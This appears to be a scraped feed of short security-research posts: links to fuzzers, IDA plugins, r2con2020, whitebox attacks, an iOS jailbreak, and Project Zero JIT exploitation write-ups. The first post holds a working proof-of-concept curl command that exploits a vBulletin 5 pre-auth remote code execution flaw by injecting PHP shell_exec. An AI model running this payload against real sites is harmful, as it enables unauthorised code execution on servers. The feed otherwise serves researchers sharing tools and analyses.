A new pre-auth 0day RCE exploit for vBulletin 5:
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
POC: curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#web #expdev #rce #0day #darw1nCTF for #r2con2020 is officially open: https://ctf.radare.org/welcome.html #reverse #CTF #dukeBarman
Introduction to Whiteboxes and Collision-Based Attacks With QBDI
https://blog.quarkslab.com/introduction-to-whiteboxes-and-collision-based-attacks-with-qbdi.html
#crypto #whitebox #waes #darw1n
https://blog.quarkslab.com/introduction-to-whiteboxes-and-collision-based-attacks-with-qbdi.html
#crypto #whitebox #waes #darw1n
Quarkslab
Introduction to Whiteboxes and Collision-Based Attacks With QBDI - Quarkslab's blog
This post is a noob-friendly introduction to whiteboxes along with the presentation and explanation of a (not-new) collision-based attack. The attack is demonstrated against a public whitebox, using QBDI to instrument and analyze the target in order to produceβ¦
Fuzzing JavaScript Engines with Aspect-preserving Mutation
https://github.com/sslab-gatech/DIE
#reverse #expdev #fuzzing #javascript #darw1n
https://github.com/sslab-gatech/DIE
#reverse #expdev #fuzzing #javascript #darw1n
GitHub
GitHub - sslab-gatech/DIE: Fuzzing JavaScript Engines with Aspect-preserving Mutation
Fuzzing JavaScript Engines with Aspect-preserving Mutation - sslab-gatech/DIE
Storm - a blackbox mutational fuzzer for detecting critical bugs in SMT solvers Article: https://numairmansur.github.io/STORM.pdf Code: https://github.com/Practical-Formal-Methods/storm #fuzzing #dukeBarman
Enumy - Linux post exploitation privilege escalation enumeration https://github.com/luke-goddard/enumy #links #linux #ctf #exploitation
GitHub
GitHub - luke-goddard/enumy: Linux post exploitation privilege escalation enumeration
Linux post exploitation privilege escalation enumeration - GitHub - luke-goddard/enumy: Linux post exploitation privilege escalation enumeration
RetDec IDA plugin version 1.0 is out:
https://engineering.avast.io/retdec-ida-plugin-v1-0-is-out/
#reverse #ida #KosBeg
https://engineering.avast.io/retdec-ida-plugin-v1-0-is-out/
#reverse #ida #KosBeg
idapm is IDA Plugin Manager via GitHub Repository https://github.com/tkmru/idapm #reverse #ida #dukeBarman
GitHub
GitHub - tkmru/idapm: idapm is IDA Plugin Manager via GitHub Repository.
idapm is IDA Plugin Manager via GitHub Repository. - tkmru/idapm
UAFuzz: Binary-level Directed Fuzzing for Use-After-Free Vulnerabilities https://github.com/strongcourage/uafuzz #fuzzing #dukeBarman
GitHub
GitHub - strongcourage/uafuzz: UAFuzz: Binary-level Directed Fuzzing for Use-After-Free Vulnerabilities
UAFuzz: Binary-level Directed Fuzzing for Use-After-Free Vulnerabilities - strongcourage/uafuzz
0.7.0 version published, all known databases can be opened, widely tested: https://github.com/williballenthin/python-idb/releases/tag/v0.7.0
Also available on PyPI now: https://pypi.org/project/python-idb/
#ida #reverse #jeisonwi
Also available on PyPI now: https://pypi.org/project/python-idb/
#ida #reverse #jeisonwi
GitHub
Release v0.7.0 Β· williballenthin/python-idb
notable changes:
support for v5.0 and v6.x
support for typeinf.FuncTypeData, argloc`
enhanced function call conventions and get_signature
improvements of IdaInfo
automated tests for scripts/*
lots...
support for v5.0 and v6.x
support for typeinf.FuncTypeData, argloc`
enhanced function call conventions and get_signature
improvements of IdaInfo
automated tests for scripts/*
lots...
Odyssey Swift-based semi-untethered jailbreak https://github.com/TheOdysseyJB/Odyssey #jailbreak #ios #exploitation #dukeBarman
GitHub
GitHub - Odyssey-Team/Odyssey: Odyssey Swift-based semi-untethered jailbreak
Odyssey Swift-based semi-untethered jailbreak. Contribute to Odyssey-Team/Odyssey development by creating an account on GitHub.
#r2con2020 will be online & FREE! - 4 days in September (from 2020-09-02 to 2020-09-05)
Stream: https://www.youtube.com/channel/UCZo6gyBPj6Vgg8u2dfIhY4Q
r2wars: https://rada.re/con/2020/#r2wars
CTF: https://ctf.radare.org/welcome.html and https://rada.re/con/2020/#CTF
Schedule: https://rada.re/con/2020/assets/r2con2020schedule.pdf
Chiptune party: https://rada.re/con/2020/#Chiptune
#reverse #videos #conference #r2con #ctf #dukeBarman
Stream: https://www.youtube.com/channel/UCZo6gyBPj6Vgg8u2dfIhY4Q
r2wars: https://rada.re/con/2020/#r2wars
CTF: https://ctf.radare.org/welcome.html and https://rada.re/con/2020/#CTF
Schedule: https://rada.re/con/2020/assets/r2con2020schedule.pdf
Chiptune party: https://rada.re/con/2020/#Chiptune
#reverse #videos #conference #r2con #ctf #dukeBarman
How efiXplorer helping to solve challenges in reverse engineering of UEFI firmware | Alex Matrosov https://www.youtube.com/watch?v=FFGQJBmRkLw #videos #uefi #reverse #ida #dukeBarman
YouTube
How efiXplorer helping to solve challenges in reverse engineering of UEFI firmware | Alex Matrosov
Webinar:
------------
How efiXplorer helping to solve challenges in reverse engineering of UEFI firmware | Alex Matrosov | Hardwear.io Webinar
About Webinar:
----------------
Existing UEFI analysis instruments lack a systemic approach to firmware vulnerabilityβ¦
------------
How efiXplorer helping to solve challenges in reverse engineering of UEFI firmware | Alex Matrosov | Hardwear.io Webinar
About Webinar:
----------------
Existing UEFI analysis instruments lack a systemic approach to firmware vulnerabilityβ¦
Analysis of Themida v3 x32 Advanced API Wrapping
https://github.com/quosego/analysis.oreans/tree/master/Documentations/Version%203/Themida/x32/3.0.8.0/Advanced%20API-Wrapping
#reverse #themida #darw1n
https://github.com/quosego/analysis.oreans/tree/master/Documentations/Version%203/Themida/x32/3.0.8.0/Advanced%20API-Wrapping
#reverse #themida #darw1n
Angr integration with Cutter's debugger https://github.com/yossizap/angrcutter #reverse #radare2 #smt #dukeBarman
GitHub
GitHub - yossizap/angrcutter: Angr integration with Cutter's debugger
Angr integration with Cutter's debugger. Contribute to yossizap/angrcutter development by creating an account on GitHub.
#r2con2020 is online & FREE - https://www.youtube.com/watch?v=sgNDYgLyAP4
Schedule: https://rada.re/con/2020/assets/r2con2020schedule.pdf
#reverse #conference #videos #r2con #dukeBarman
Schedule: https://rada.re/con/2020/assets/r2con2020schedule.pdf
#reverse #conference #videos #r2con #dukeBarman
YouTube
r2con2020 DAY1 Live Stream
SLIDES https://github.com/radareorg/r2con2020/tree/master/day1
π TALK INDEX π
0:00 r2con2020 day 1
20:35 Opening r2con2020 keynote by Pancake
35:48 r2wars for n00bs by @CaptnBanana
59:00 r2wars training round 1
1:51:40 Mobile reverse engineering with r2fridaβ¦
π TALK INDEX π
0:00 r2con2020 day 1
20:35 Opening r2con2020 keynote by Pancake
35:48 r2wars for n00bs by @CaptnBanana
59:00 r2wars training round 1
1:51:40 Mobile reverse engineering with r2fridaβ¦
This three-part series highlights the technical challenges involved in finding and exploiting JavaScript engine vulnerabilities in modern web browsers and evaluates current exploit mitigation technologies. The exploited vulnerability, CVE-2020-9802, was fixed in iOS 13.5, while two of the mitigation bypasses, CVE-2020-9870 and CVE-2020-9910, were fixed in iOS 13.6.
JITSploitation I: A JIT Bug
https://googleprojectzero.blogspot.com/2020/09/jitsploitation-one.html
JITSploitation II: Getting Read/Write
https://googleprojectzero.blogspot.com/2020/09/jitsploitation-two.html
JITSploitation III: Subverting Control Flow
https://googleprojectzero.blogspot.com/2020/09/jitsploitation-three.html
#mobile #ios #javascript #browser #jit #webkit #expdev #cve #reverse #darw1n
JITSploitation I: A JIT Bug
https://googleprojectzero.blogspot.com/2020/09/jitsploitation-one.html
JITSploitation II: Getting Read/Write
https://googleprojectzero.blogspot.com/2020/09/jitsploitation-two.html
JITSploitation III: Subverting Control Flow
https://googleprojectzero.blogspot.com/2020/09/jitsploitation-three.html
#mobile #ios #javascript #browser #jit #webkit #expdev #cve #reverse #darw1n
Blogspot
JITSploitation I: A JIT Bug
By Samuel Gro Γ , Project Zero This three-part series highlights the technical challenges involved in finding and exploiting JavaScri...